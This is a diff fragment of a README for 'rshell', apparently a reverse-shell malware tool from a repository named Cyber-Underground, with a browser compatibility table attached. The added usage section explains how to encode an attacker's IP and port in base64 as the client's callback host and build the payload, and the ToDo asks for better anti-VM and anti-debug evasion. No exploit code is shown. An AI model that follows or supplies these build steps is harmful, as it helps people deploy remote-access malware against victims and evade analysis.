Cyber-Underground/rshell/README.md

 | 30 | Pale Moon | &#9989; | &#9989; | &#8987; | &#8987; |
 --------------------------------------------------
 Basically anything based on chromium or gecko

+# How to use?
+First of all you need to decide which version of rshell listener you're using, netcore version works with Linux and other one works on Windows.
+Open rshell client, find host IP which is encoded with base64, now you should add your own IP + port you will be listening at into it as base64 for example http://127.0.0.1:1337/ = aHR0cDovLzEyNy4wLjAuMToxMzM3Lw== Now build the file and hope it works x)

 # ToDo:
 * Improve anti-vm and anti-debug systems.